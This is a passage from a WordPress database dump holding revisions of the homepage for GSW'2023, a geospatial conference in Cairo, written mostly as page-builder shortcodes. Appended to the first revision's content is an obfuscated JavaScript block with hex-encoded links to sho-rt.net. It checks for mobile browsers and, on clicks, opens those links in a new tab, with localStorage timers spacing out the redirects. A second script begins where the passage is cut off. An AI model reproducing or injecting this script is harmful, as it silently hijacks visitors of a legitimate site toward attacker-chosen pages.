cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:56:23','2022-11-09 19:56:23','',3066,'https://gsw2023.com/?p=3207',0,'revision','',0),
(3208,1,'2022-11-09 19:57:33','2022-11-09 19:57:33','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668023848681{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function 